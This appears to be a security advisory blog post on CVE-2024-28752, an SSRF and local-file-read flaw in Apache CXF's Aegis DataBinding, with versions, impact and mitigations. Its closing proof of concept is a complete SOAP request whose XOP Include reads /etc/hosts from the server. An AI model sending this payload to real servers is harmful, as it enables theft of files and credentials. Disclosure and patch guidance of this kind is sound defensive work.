Apache CXF Aegis DataBinding SSRF – CVE-2024-28752

Posted on

Vulnerable Version

before 4.0.4, 3.6.3 and 3.5.8

Fixed Version

versions 4.0.4, 3.6.3, or 3.5.8 or later

Base Score

9.3 critical                                                                  

Vendor Discription:-

Apache CXF is an open-source services framework that enables developers to create and maintain safe, resilient web services. It supports both SOAP and RESTful web service protocols, making it adaptable to various architectures. CXF interacts seamlessly with Java programs and supports service creation via annotations or configuration files. It is frequently used in enterprise environments due to its robust support for security, logging, and service interoperability. Overall, Apache CXF facilitates the creation and deployment of scalable, standards-compliant web services.

CVE-2024-28752 Description:-

An SSRF vulnerability in Apache CXF versions prior to 4.0.4, 3.6.3, and 3.5.8 allows an attacker to launch SSRF-style attacks on webservices that accept at least one parameter of any type. This vulnerability only affects services using the Aegis DataBinding; other data bindings, including the default, are unaffected. Attackers can use this vulnerability to obtain access to internal resources by forcing the server to submit requests to arbitrary URLs, potentially exposing information or launching additional attacks on internal systems.

Impact:

  • Read arbitrary local files on the server, exposing sensitive data and configuration files.
  • Perform SSRF to access internal-only services or cloud metadata endpoints.
  • Steal credentials or secrets that may enable unauthorized access to other systems.
  • Map internal infrastructure through SSRF-based port scanning or service probing.
  • Facilitate chained attacks that could lead to privilege escalation or remote code execution using leaked information.

Mitigation

  • Upgrade to Apache CXF version 4.0.4, 3.6.3, or 3.5.8 (or newer) where this vulnerability is fixed.
  • Stop using Aegis DataBinding — switch to a secure, supported alternative like the default JAXB data binding.
  • Validate and sanitize all input parameters, especially those used in web service calls.
  • Restrict outbound network traffic using firewall rules, egress controls, or proxy whitelists.
  • Disable unused data bindings or services to minimize attack surface.

POC

Send this request to the server

POST /test HTTP/1.1
Host: your-ip:8080
Content-Type: multipart/related; boundary=----kkkkkk123123213
Content-Length: 472
Connection: close

------kkkkkk123123213
Content-Disposition: form-data; name="1"

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://service.namespace/">
   <soapenv:Header/>
   <soapenv:Body>
      <web:test>
         <arg0>
<count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///etc/hosts"></xop:Include></count>
</arg0>
      </web:test>
   </soapenv:Body>
</soapenv:Envelope>
------kkkkkk123123213--
image 1

Leave a Reply

Your email address will not be published. Required fields are marked *